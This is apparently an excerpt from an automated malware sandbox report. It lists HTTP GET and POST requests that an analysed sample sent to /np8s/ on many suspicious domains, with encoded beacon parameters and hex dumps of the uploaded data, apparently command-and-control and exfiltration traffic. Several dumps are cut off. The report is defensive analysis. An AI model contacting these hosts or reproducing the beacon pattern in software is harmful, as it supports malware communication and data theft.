Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=RNX6HKFDcklLmbBc9PWX652dIgRYJcuZVnkYPjFZaGFpi0fgSjcQ52/zYZHNiyjWO0COcN7HSw==&Eh=mhUxl HTTP/1.1Host: www.vitality-patients.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEMEN43A2RNb83bcySA==&Eh=mhUxl HTTP/1.1Host: www.topings33.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?aDHdzD=vpgdJ4mxrh&3fk4oN=Hfm8tjP++bF99H8Yixu4yiAA2pucxCUNYZIpJGNk6F/7VNXQ3kF6oq1cnnPYkdM2cMsNINi87w== HTTP/1.1Host: www.harmlett.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=upNApQGgxnIpkDsed4j6UePR+EOmKhNhiuHKrn3aPCq0+c3DSqp4vkB5DGytvWTvww8fhFgzIA==&aDHdzD=vpgdJ4mxrh HTTP/1.1Host: www.waermark.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=0pptgqp0MeRyeb/9nmudohOLKq4u2ksDwR1w+rnfL4/we0tceqenlGY7vNOGaAQzxdf5zVwFvA==&aDHdzD=vpgdJ4mxrh HTTP/1.1Host: www.getbusinesscreditandfunding.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=0pptgqp0MeRyeb/9nmudohOLKq4u2ksDwR1w+rnfL4/we0tceqenlGY7vNOGaAQzxdf5zVwFvA==&Eh=mhUxl HTTP/1.1Host: www.getbusinesscreditandfunding.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=1Nsioc0lpQImfCEv7q3CJRvbkNIovvFEONaUY8zyneWF7ypKO8GgemnIz/Jz3qNJ0RZyolUFog==&Eh=mhUxl HTTP/1.1Host: www.xn--wsthof-camping-gsb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 198.54.117.217 198.54.117.217
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.siberup.xyzConnection: closeContent-Length: 416Cache-Control: no-cacheOrigin: http://www.siberup.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.siberup.xyz/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 54 42 6a 6c 49 4a 43 7a 76 72 46 6c 48 44 46 71 44 41 63 48 44 58 65 58 65 4c 38 31 73 66 78 51 69 68 4b 71 32 4a 6a 49 56 68 44 33 37 6d 66 41 70 79 41 35 66 72 6e 43 32 53 52 33 4e 6d 6b 68 35 38 6a 34 50 53 58 42 5a 71 6f 2d 6e 54 44 61 4b 51 64 4c 72 69 34 53 47 38 72 37 75 58 72 56 4d 57 50 66 6f 4f 64 2d 30 4a 5a 48 47 6c 62 58 51 39 33 67 7a 4e 43 32 41 63 59 6e 62 6f 4e 6c 6d 56 7e 4b 6a 49 7a 47 48 7a 59 4d 77 45 30 68 44 50 6d 7a 35 71 65 5f 6f 66 58 69 42 56 76 79 52 5f 65 6f 57 48 55 31 41 58 37 43 35 49 4a 36 73 53 61 38 77 48 46 6f 42 58 67 35 57 5f 44 53 6f 73 69 78 6f 57 31 38 5a 54 69 6e 6e 48 73 48 34 62 51 53 54 58 4c 38 55 42 4a 6e 67 65 56 55 68 38 43 56 76 45 7a 36 31 63 32 44 75 62 75 6e 36 4a 44 72 65 63 43 4a 67 64 49 4b 57 61 63 53 72 51 6c 34 67 6d 41 61 36 46 76 6a 47 4b 71 62 6f 30 76 62 58 57 56 55 74 66 69 64 6c 37 76 62 41 38 4e 6b 4a 34 44 57 5a 4b 48 59 39 62 59 46 4c 41 57 4c 33 70 73 50 63 51 62 75 46 4c 4f 42 67 65 67 50 58 51 70 52 34 6b 36 6d 31 6e 49 59 44 58 6b 50 68 4c 6a 4a 58 45 59 45 33 2d 74 4c 48 6d 42 79 57 31 28 63 5a 31 6a 74 69 71 31 6b 4e 56 41 71 77 48 36 76 6a 35 7a 64 78 67 46 49 6c 4f 49 70 5a 46 32 41 73 36 34 70 30 58 37 32 6e 36 42 64 7e 47 45 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fk4oN=TBjlIJCzvrFlHDFqDAcHDXeXeL81sfxQihKq2JjIVhD37mfApyA5frnC2SR3Nmkh58j4PSXBZqo-nTDaKQdLri4SG8r7uXrVMWPfoOd-0JZHGlbXQ93gzNC2AcYnboNlmV~KjIzGHzYMwE0hDPmz5qe_ofXiBVvyR_eoWHU1AX7C5IJ6sSa8wHFoBXg5W_DSosixoW18ZTinnHsH4bQSTXL8UBJngeVUh8CVvEz61c2Dubun6JDrecCJgdIKWacSrQl4gmAa6FvjGKqbo0vbXWVUtfidl7vbA8NkJ4DWZKHY9bYFLAWL3psPcQbuFLOBgegPXQpR4k6m1nIYDXkPhLjJXEYE3-tLHmByW1(cZ1jtiq1kNVAqwH6vj5zdxgFIlOIpZF2As64p0X72n6Bd~GE.
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.siberup.xyzConnection: closeContent-Length: 36488Cache-Control: no-cacheOrigin: http://www.siberup.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.siberup.xyz/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 54 42 6a 6c 49 49 7e 70 69 34 42 4f 4e 7a 35 5a 45 7a 73 54 58 30 47 56 62 34 51 36 77 4b 34 49 6f 77 61 59 72 5a 79 70 62 45 47 6d 78 32 43 69 34 68 78 6d 66 75 43 55 75 51 31 7a 61 57 6f 69 35 38 71 70 50 53 62 42 61 72 77 51 67 79 53 39 4b 79 6c 45 6f 43 34 69 4a 63 71 6c 34 6a 69 48 4d 57 4b 49 6f 4f 55 6d 33 38 46 48 55 32 7a 58 62 61 6a 72 39 4e 44 39 4e 38 49 37 57 4a 78 53 6d 56 6e 50 6a 4b 33 47 47 44 45 4d 78 6b 45 6d 42 49 4b 30 6a 4b 66 33 74 66 58 37 54 56 72 6d 52 5f 61 57 57 47 34 31 41 6b 50 43 35 63 46 36 35 52 43 5f 6f 6e 46 70 51 6e 67 34 53 5f 4f 63 6f 73 7e 39 6f 55 59 48 61 68 7e 6e 39 58 73 47 72 5a 77 61 58 41 28 76 59 68 4d 31 67 66 6f 49 68 70 6a 47 76 46 4f 66 7a 75 65 34 72 34 58 49 36 4c 75 6c 62 38 43 46 34 4e 49 72 57 61 63 55 72 51 6c 6e 67 6d 51 61 36 47 50 6a 48 72 61 62 75 45 76 61 59 57 56 56 31 76 6a 46 76 62 71 6b 41 38 46 65 4a 35 61 7a 65 34 33 59 38 4a 51 46 4b 6a 4f 4d 35 5a 73 4a 5a 51 61 37 50 72 4f 65 67 65 67 58 58 56 56 37 34 54 53 6d 30 79 38 59 46 78 59 50 6b 37 6a 4a 4a 30 59 47 74 4f 52 62 48 6d 4a 32 57 78 37 6d 5a 43 62 74 6a 37 56 6b 4a 45 41 71 30 33 36 76 36 70 7a 4f 68 43 67 46 39 74 70 69 61 57 7e 4e 30 37 67 32 73 46 32 6d 28 34 39 5a 74 43 32 51 64 79 68 42 66 4a 39 38 44 61 77 6f 67 47 4f 79 6f 42 67 69 72 62 4a 41 79 63 4d 55 6f 78 47 76 6b 69 61 54 4f 4d 30 55 35 4e 68 52 69 68 69 41 72 6b 54 48 32 41 7a 71 4c 36 6d 6b 66 43 66 35 58 47 35 48 4c 79 75 4d 44 54 68 6c 6d 50 39 63 4f 51 76 6e 55 57 28 6d 65 4e 30 62 32 56 72 4a 76 5f 6e 44 4a 75 5a 74 34 64 69 52 48 49 70 56 53 73 6d 56 70 5f 33 53 78 2d 62 46 39 35 45 55 74 6c 76 4d 6b 68 41 5f 5a 47 77 4a 57 68 53 56 62 73 43 54 52 61 7a 6c 4d 39 51 46 68 38 54 66 4d 30 50 43 41 47 42 51 62 4c 70 75 69 4c 31 47 45 4d 49 6b 67 4a 67 77 61 68 7e 62 6d 75 38 57 68 5a 42 62 45 57 4a 6d 75 57 6b 51 5a 4c 6b 77 79 72 59 64 34 55 48 43 6e 65 7a 64 35 55 4f 35 68 6f 4e 66 6a 46 44 71 65 54 52 4e 74 43 62 70 77 67 78 6c 44 6c 70 79 34 57 64 2d 30 32 53 53 64 4b 37 35 75 64 70 4a 5a 43 7a 49 52 76 4f 71 4d 72 78 71 31 32 70 74 32 53 48 75 46 75 54 57 57 65 7a 33 4a 37 68 67 32 4c 5a 36 6c 74 56 75 38 79 35 4b 6b 79 72 59 73 31 68 56 38 74 41 54 59 6d 35 58 71 4f 54 61 68 74 61 4e 4c 61 70 36 71 4f 4d 37 6d 75 4a 34 6e 63 6c 50 4a 71 5a 75 6c 76 76 5f 28 6b 46 42 6a 31 7e 69 38 64 63 6b 55 6e 69 2d 56 5f 4f 74 73 55 46 66 61 46 5a 61 49 51 37 34 4f 30 70 6b 4d 77 49 4e 63 37 71 52 7a 67 76 53 77 56 68 6e 76 6f 4a 69 68 64 53 64 79 5a 74 75 70 38 67 2d 75 38 45 4d 53 4f 63 4d 5a 41 31 32 65 61 54 63 32 45 59 4d 52 30 59 58 39 37 38 58
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.harmlett.comConnection: closeContent-Length: 416Cache-Control: no-cacheOrigin: http://www.harmlett.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.harmlett.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 49 64 53 47 7a 46 72 78 34 73 63 44 6b 31 73 59 6a 6b 28 59 69 47 49 42 77 4a 32 43 77 6a 78 49 61 65 51 73 58 45 31 56 79 30 76 34 58 73 4f 55 35 46 55 55 36 4e 6b 75 35 57 4c 78 38 4d 39 67 62 62 42 58 54 2d 7e 32 67 47 58 35 69 42 48 55 41 68 52 55 75 6f 43 52 47 54 52 6d 6c 32 38 46 61 4c 6b 64 67 6c 32 41 6e 4e 57 31 49 64 35 65 6d 53 51 4f 34 5a 6b 6d 4a 74 50 56 38 71 52 62 6f 6f 36 4b 45 62 38 32 76 58 38 52 43 4a 37 6e 5a 39 64 72 64 6a 52 38 54 47 74 4a 4b 73 57 30 34 62 4c 7a 30 78 61 56 4e 45 6a 5a 37 36 56 51 62 5f 71 6a 51 69 32 31 35 7a 54 66 28 35 5a 77 56 4b 4e 44 79 69 62 7a 4e 4b 54 63 44 33 58 6f 35 6a 46 58 34 74 65 41 7a 31 54 6b 37 7a 64 56 30 74 6c 4b 71 38 71 52 58 32 69 72 28 65 79 76 38 45 50 49 4f 42 42 63 41 4e 54 65 43 52 73 63 66 66 55 66 64 5f 37 49 78 76 75 54 56 30 72 34 64 57 7a 78 4d 50 75 68 55 6f 36 44 67 4f 53 61 77 38 78 7a 64 5f 71 41 67 6c 38 77 5a 48 43 67 41 50 38 62 6d 72 65 5a 48 70 5a 72 76 72 6f 73 71 52 58 50 7e 49 52 57 63 56 73 54 42 36 4d 79 6d 33 61 58 64 78 45 50 5a 61 76 59 73 5a 31 61 74 64 32 64 6b 35 55 6e 39 36 49 72 69 54 74 35 5a 51 30 64 67 65 48 54 38 37 7e 5f 55 44 67 45 4a 36 43 73 75 6a 74 2d 70 42 35 57 44 7a 58 56 41 4e 6b 64 4e 51 38 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fk4oN=IdSGzFrx4scDk1sYjk(YiGIBwJ2CwjxIaeQsXE1Vy0v4XsOU5FUU6Nku5WLx8M9gbbBXT-~2gGX5iBHUAhRUuoCRGTRml28FaLkdgl2AnNW1Id5emSQO4ZkmJtPV8qRboo6KEb82vX8RCJ7nZ9drdjR8TGtJKsW04bLz0xaVNEjZ76VQb_qjQi215zTf(5ZwVKNDyibzNKTcD3Xo5jFX4teAz1Tk7zdV0tlKq8qRX2ir(eyv8EPIOBBcANTeCRscffUfd_7IxvuTV0r4dWzxMPuhUo6DgOSaw8xzd_qAgl8wZHCgAP8bmreZHpZrvrosqRXP~IRWcVsTB6Mym3aXdxEPZavYsZ1atd2dk5Un96IriTt5ZQ0dgeHT87~_UDgEJ6Csujt-pB5WDzXVANkdNQ8.
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.harmlett.comConnection: closeContent-Length: 36488Cache-Control: no-cacheOrigin: http://www.harmlett.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.harmlett.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 49 64 53 47 7a 46 6e 5a 31 34 74 56 71 46 68 32 69 78 7a 4d 74 53 4d 50 33 35 79 47 28 43 77 51 4e 50 42 58 61 68 4a 42 7a 77 72 2d 54 66 37 62 39 45 63 4d 36 50 38 44 30 46 75 35 35 73 78 68 62 62 49 45 54 5f 4b 32 68 46 57 6d 69 6a 28 79 41 44 35 58 71 49 44 6f 55 44 52 5f 76 69 38 6f 61 4b 51 72 67 6c 7e 51 6d 39 36 31 4a 2d 42 65 76 31 38 48 6e 70 6b 38 53 74 66 4a 79 4b 73 4c 6f 6f 7a 50 45 5a 34 32 75 6e 77 52 54 63 7a 6d 62 36 68 73 55 54 52 35 57 47 73 4a 41 4d 4b 6e 34 62 4f 6d 30 7a 65 56 4f 32 48 5a 34 4f 5a 51 4f 2d 71 67 45 43 32 77 6f 6a 53 64 37 34 6c 68 56 4c 6c 78 79 6a 66 5a 4e 5a 7a 63 44 48 58 70 38 77 6c 31 70 75 48 41 67 6c 4f 30 37 7a 52 38 7a 38 35 43 71 39 48 30 66 67 6e 66 36 38 61 46 38 48 69 64 43 42 41 56 49 74 53 61 43 52 73 57 66 66 55 31 64 5f 4c 49 78 73 7e 54 58 57 7a 34 62 6d 7a 79 44 50 76 72 66 49 36 41 33 2d 65 71 77 39 56 6a 64 2d 7e 71 68 58 4d 77 4c 69 65 67 52 2d 38 55 73 62 65 6c 4c 4a 5a 50 72 72 6f 6a 71 52 57 73 7e 4d 46 47 62 6b 38 54 41 76 67 79 71 31 43 58 62 42 45 50 63 61 76 57 69 35 35 77 74 64 76 56 6b 38 78 61 36 4d 45 72 69 41 6c 35 59 78 30 64 67 75 48 54 36 37 28 53 43 44 41 4a 53 70 62 72 6c 53 74 6d 31 44 42 65 44 54 53 63 55 65 67 35 54 33 35 2d 4e 4a 48 51 41 7a 39 58 68 32 53 43 4f 68 59 73 45 48 6d 5f 71 4a 6b 59 7e 38 43 57 79 66 31 48 42 61 5a 30 4c 61 4e 45 66 55 32 4f 28 44 28 74 54 47 34 34 63 68 7a 35 68 74 33 51 7a 51 61 6f 6a 36 62 59 74 4c 52 66 66 31 77 2d 39 44 6f 50 58 49 7a 73 53 5a 4d 78 70 63 33 58 43 4e 75 44 49 30 50 49 51 4b 68 43 49 33 63 5a 4e 43 7a 62 72 31 51 77 79 47 6e 31 57 61 4d 78 75 5f 69 59 55 4f 59 50 73 53 74 4c 72 30 4d 77 7e 38 28 41 4b 71 46 67 71 48 4a 4e 52 73 46 6a 54 39 5a 46 31 38 4d 33 30 67 39 2d 39 4b 69 79 65 6c 6b 54 7e 66 65 74 76 63 61 75 7a 53 6d 4c 43 55 57 41 37 6f 72 44 63 41 7e 43 6d 4f 4d 49 6d 38 35 63 7a 30 61 37 33 53 47 50 58 5f 48 66 39 46 6f 63 50 2d 59 6b 72 61 28 71 35 77 4c 59 78 54 6f 78 70 6e 75 45 4e 76 48 72 42 58 4d 62 4e 73 56 67 57 6e 7a 35 4a 63 53 65 38 45 47 6c 38 4f 31 39 6b 6e 49 35 72 54 34 66 37 39 56 6e 72 69 31 55 4b 5a 33 52 41 64 4c 5a 4c 5a 63 2d 7a 6f 73 56 6c 47 6b 53 53 54 34 47 61 37 46 59 6d 59 52 59 42 73 53 6d 49 42 63 53 72 71 46 53 78 4c 4b 5a 63 63 28 34 6f 38 33 6e 70 56 50 6d 76 54 43 4e 47 6d 69 56 64 39 38 68 75 4a 36 52 4a 74 37 4e 46 31 46 70 4a 48 71 73 41 63 71 73 39 41 44 6f 4a 31 61 52 49 79 53 33 56 42 58 43 64 6e 67 7a 35 43 56 61 4a 63 4c 55 77 4a 68 6c 57 63 38 38 56 53 41 39 34 75 33 78 75 79 50 67 64 52 46 69 73 42 63 6f 59 44 79 79 67 79 49 53 43 36 59 34 70 77 69
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.brandpay.xyzConnection: closeContent-Length: 416Cache-Control: no-cacheOrigin: http://www.brandpay.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.brandpay.xyz/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 75 69 30 6d 56 38 72 6a 53 34 52 34 67 33 36 53 48 4a 55 72 31 71 39 55 78 4e 73 4a 65 61 6a 30 68 6f 58 49 76 39 48 79 54 46 62 4a 31 44 53 4b 6d 79 38 56 56 63 75 55 78 62 4e 57 7e 67 4c 48 64 78 54 30 28 72 48 34 4e 58 35 56 6c 58 62 5a 42 69 74 34 37 2d 76 6e 44 45 41 57 43 77 50 4b 44 4f 28 67 74 65 48 71 37 56 6f 79 6a 4d 35 45 70 38 68 6f 33 33 7a 62 62 76 45 61 45 2d 42 70 45 36 69 39 48 2d 42 44 6b 74 6e 5f 4c 66 46 68 70 76 31 77 4c 73 62 6a 43 61 43 51 4c 5a 4e 4f 43 64 5a 6c 63 44 71 52 55 41 43 43 58 6a 4e 41 52 7a 63 64 35 54 6e 39 4e 37 4c 41 5a 44 63 39 62 47 34 6b 6b 43 4d 74 4c 76 35 61 67 70 4f 79 42 77 39 45 72 43 68 58 33 46 75 61 54 41 36 52 33 45 37 4b 50 41 57 68 54 37 31 6e 6b 4c 4c 69 6f 35 48 54 49 64 78 2d 4c 63 76 39 48 30 53 6f 74 31 39 4c 4f 61 62 32 48 77 49 51 33 74 37 36 44 6f 77 64 43 58 42 58 47 76 33 49 59 30 36 76 38 77 4b 39 72 6e 32 76 66 41 71 7a 57 71 75 67 6a 6b 63 4e 32 5a 50 74 45 67 54 4f 53 56 37 34 6f 2d 64 4a 49 43 33 61 5a 74 4f 76 6d 64 52 37 53 6e 50 62 52 36 4d 5f 7e 44 56 73 32 43 74 59 52 52 31 4c 52 36 44 61 75 68 4e 36 71 56 56 31 31 31 52 38 61 33 47 46 49 4d 28 78 79 72 6f 77 79 54 68 4c 28 61 79 65 70 4f 61 74 37 30 64 6a 65 70 38 4f 48 77 51 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fk4oN=ui0mV8rjS4R4g36SHJUr1q9UxNsJeaj0hoXIv9HyTFbJ1DSKmy8VVcuUxbNW~gLHdxT0(rH4NX5VlXbZBit47-vnDEAWCwPKDO(gteHq7VoyjM5Ep8ho33zbbvEaE-BpE6i9H-BDktn_LfFhpv1wLsbjCaCQLZNOCdZlcDqRUACCXjNARzcd5Tn9N7LAZDc9bG4kkCMtLv5agpOyBw9ErChX3FuaTA6R3E7KPAWhT71nkLLio5HTIdx-Lcv9H0Sot19LOab2HwIQ3t76DowdCXBXGv3IY06v8wK9rn2vfAqzWqugjkcN2ZPtEgTOSV74o-dJIC3aZtOvmdR7SnPbR6M_~DVs2CtYRR1LR6DauhN6qVV111R8a3GFIM(xyrowyThL(ayepOat70djep8OHwQ.
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.brandpay.xyzConnection: closeContent-Length: 36488Cache-Control: no-cacheOrigin: http://www.brandpay.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.brandpay.xyz/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 75 69 30 6d 56 34 71 36 63 6f 39 62 71 48 48 79 4b 61 6c 79 39 2d 42 53 39 64 6f 61 43 75 79 30 6d 63 61 78 73 49 37 68 43 30 6a 54 7e 54 4f 6e 69 7a 6b 7a 56 5a 53 74 38 4a 70 61 35 46 54 45 64 78 4c 57 28 71 48 34 4d 55 35 46 69 78 4b 32 42 41 31 37 34 65 76 62 43 45 41 31 56 69 37 6a 44 4f 37 43 74 65 50 36 34 6d 38 79 6a 76 42 45 67 62 4e 33 6f 48 7a 42 53 4c 6f 38 4a 65 4e 30 45 36 4b 6c 48 38 56 44 6c 64 72 5f 4c 38 64 2d 38 38 74 33 43 63 62 36 48 61 44 4f 46 4a 52 43 43 64 73 41 63 42 4f 52 58 32 36 43 57 79 74 41 55 45 4a 4c 78 44 6e 34 48 62 4c 47 49 7a 51 73 62 47 4d 57 6b 48 31 53 4d 64 6c 61 68 5a 4f 7a 46 6d 39 39 36 42 49 56 31 45 61 39 54 41 47 38 33 56 57 4e 50 42 4b 4e 54 49 63 52 72 4e 66 59 6f 37 71 4f 4f 39 78 36 4d 73 76 6d 48 30 54 41 74 31 38 6f 4f 61 72 32 48 33 73 51 6c 63 4c 36 47 59 77 61 66 48 42 59 4d 50 33 58 63 30 33 65 38 77 69 74 72 6a 69 42 59 32 7e 7a 55 2d 47 67 32 56 63 4d 6a 35 50 76 5a 51 54 69 66 31 37 37 6f 2d 63 65 49 48 62 30 59 63 53 76 6e 49 39 37 65 6c 58 62 43 36 4d 5f 37 44 56 75 39 69 68 49 52 51 52 50 52 37 7a 6b 75 53 68 36 6b 6b 31 31 31 57 4a 38 63 48 47 46 41 73 7e 7a 39 62 56 4b 32 69 34 74 38 72 71 50 31 64 43 4f 34 6a 31 70 45 59 63 4b 66 57 32 31 78 6f 72 7a 51 6a 52 2d 6a 7a 47 35 52 38 6e 78 73 74 77 4d 4a 5a 59 55 54 4a 4c 77 67 48 56 4f 64 4b 52 42 4e 52 66 48 78 74 6e 4e 69 7a 36 66 4c 44 63 54 35 74 41 36 39 42 77 58 39 46 4d 4c 31 43 52 33 43 64 6b 51 7a 6f 75 58 74 57 63 67 78 44 49 4b 4c 6e 4c 4e 42 55 6a 42 58 32 65 78 76 73 78 62 56 62 64 57 70 78 42 77 6f 59 43 53 54 44 7e 35 31 59 53 2d 50 6d 61 53 64 6f 49 46 67 54 37 47 4d 56 6a 46 68 59 67 69 43 68 59 72 5a 50 70 4f 4f 6d 53 33 4e 31 39 64 42 33 6f 69 6c 50 4e 32 43 47 39 47 6d 4b 31 48 68 35 61 41 6b 32 63 6c 6b 52 5a 74 6c 6b 67 41 64 31 37 4a 35 79 42 5a 39 4e 5a 71 68 42 39 65 48 42 77 6f 67 36 7a 51 44 70 33 38 6f 45 33 59 44 6e 77 37 6f 74 42 4c 4e 6d 58 31 4c 4a 71 61 33 73 6e 33 6b 4a 62 41 69 51 76 6a 46 68 39 5f 6e 4b 67 4b 51 76 6d 2d 62 72 34 6c 65 61 30 62 70 67 33 6b 68 55 53 5f 41 63 4e 4f 45 50 56 7a 28 59 33 68 51 37 42 61 65 75 35 76 76 51 44 4a 70 73 6d 2d 58 6e 6f 7a 44 57 77 42 79 6c 38 34 43 47 4e 43 66 32 66 63 36 56 30 46 65 71 77 6e 38 39 46 4a 32 53 37 73 65 58 68 7a 4c 72 75 51 37 78 56 77 32 5a 36 4d 73 73 54 57 4c 5a 47 74 49 37 4f 78 39 66 35 37 33 4e 73 68 4e 61 37 55 49 52 7a 42 68 6c 48 57 4a 4c 45 56 6e 31 43 5f 44 6e 59 55 6f 6a 7a 37 4e 36 39 52 72 6f 4a 79 28 35 33 54 79 50 37 70 48 42 32 4c 30 38 28 48 4a 75 75 67 31 46 48 79 6f 61 41 4b 4a 4f 28 62 41 53 6c 79 75 37 43
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.tentanguang.onlineConnection: closeContent-Length: 416Cache-Control: no-cacheOrigin: http://www.tentanguang.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tentanguang.online/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 67 36 61 46 43 2d 36 55 39 4f 50 78 75 46 34 67 72 44 28 65 66 75 51 48 38 66 31 43 73 45 43 65 72 46 77 4c 75 49 49 2d 50 59 55 73 45 64 77 68 79 53 62 4e 56 70 38 4f 72 66 6f 69 47 4c 4c 43 34 79 66 69 50 49 78 5a 76 65 35 6f 4d 64 73 44 38 5f 51 69 62 2d 45 54 79 6c 30 62 5a 70 48 47 78 48 41 2d 71 37 55 66 43 67 6c 46 28 36 72 4a 6b 37 70 4d 78 4b 45 64 53 74 6f 37 6a 33 57 5a 51 2d 6a 62 73 71 68 4a 72 39 68 79 48 66 63 55 4b 69 30 72 6b 73 49 34 4a 70 5a 4f 7a 64 6b 6f 50 66 66 48 62 55 38 34 67 6d 38 35 62 78 55 42 55 35 47 55 69 68 54 42 36 66 4b 6c 58 55 36 4a 46 77 67 79 44 44 76 61 35 6d 66 54 74 7a 4d 76 70 5f 79 56 67 59 44 4b 53 53 65 47 44 6f 34 74 35 71 52 64 43 38 6d 37 4d 39 42 48 53 32 78 2d 5a 53 71 43 66 50 33 34 38 56 4f 61 65 33 71 32 66 41 6d 6d 78 57 68 49 6d 44 78 32 4a 61 6b 44 6f 48 63 6f 6e 66 41 62 32 37 44 30 54 44 42 44 78 64 71 72 65 4d 52 57 28 6f 65 4e 62 68 6f 6c 36 30 74 6c 33 72 45 71 42 6e 50 33 5a 6f 6a 2d 6a 6d 65 64 30 4e 50 70 58 71 44 62 6d 62 31 34 4d 79 59 70 45 4d 6b 4f 41 6f 35 4d 55 78 30 77 77 5f 77 72 78 6d 66 73 28 33 6a 59 71 36 70 46 7a 66 57 6a 32 41 4f 5a 72 51 32 44 72 4c 78 52 59 4c 4e 64 71 4b 53 62 42 47 6e 2d 58 53 71 4f 67 57 52 50 33 4d 30 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fk4oN=g6aFC-6U9OPxuF4grD(efuQH8f1CsECerFwLuII-PYUsEdwhySbNVp8OrfoiGLLC4yfiPIxZve5oMdsD8_Qib-ETyl0bZpHGxHA-q7UfCglF(6rJk7pMxKEdSto7j3WZQ-jbsqhJr9hyHfcUKi0rksI4JpZOzdkoPffHbU84gm85bxUBU5GUihTB6fKlXU6JFwgyDDva5mfTtzMvp_yVgYDKSSeGDo4t5qRdC8m7M9BHS2x-ZSqCfP348VOae3q2fAmmxWhImDx2JakDoHconfAb27D0TDBDxdqreMRW(oeNbhol60tl3rEqBnP3Zoj-jmed0NPpXqDbmb14MyYpEMkOAo5MUx0ww_wrxmfs(3jYq6pFzfWj2AOZrQ2DrLxRYLNdqKSbBGn-XSqOgWRP3M0.
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.tentanguang.onlineConnection: closeContent-Length: 36488Cache-Control: no-cacheOrigin: http://www.tentanguang.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tentanguang.online/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 67 36 61 46 43 37 62 52 35 36 33 6f 74 56 30 44 71 47 7a 43 51 2d 41 46 37 76 78 42 77 77 54 45 75 77 41 35 7a 59 34 70 4f 62 4a 39 41 73 63 4d 32 52 71 4f 56 6f 67 72 6a 4b 41 6d 4d 36 33 44 34 30 33 4d 50 4a 46 5a 6f 75 52 65 4d 5f 55 70 38 5a 73 6c 63 65 46 6d 67 31 31 62 64 73 6d 6b 78 48 56 62 71 37 63 31 43 77 78 46 38 63 6e 4a 6d 38 63 41 75 61 45 45 66 4e 34 5f 7e 6e 53 2d 51 2d 36 63 73 76 42 4a 72 4e 74 79 45 2d 73 58 4d 68 4d 6b 28 73 4a 54 4d 70 59 51 6f 4e 5a 52 50 65 50 68 62 56 41 34 6a 56 59 35 62 68 30 42 64 75 36 58 74 78 54 5a 73 76 4b 69 47 6b 7e 69 46 77 74 7a 44 42 44 67 34 55 44 54 73 44 4d 79 6c 4e 54 71 33 37 72 37 51 54 72 5f 44 6f 38 55 35 37 4d 59 43 39 6d 58 4f 4f 49 78 64 30 5a 51 5a 58 61 6b 64 76 32 7a 30 31 50 47 65 33 71 53 66 41 6e 73 78 56 4a 49 6d 45 4e 32 62 6f 38 44 28 48 63 76 6f 66 41 65 39 62 43 71 46 7a 46 6e 78 65 61 52 65 4e 6f 7a 28 61 65 4e 62 7a 51 6c 28 57 56 69 35 62 45 73 45 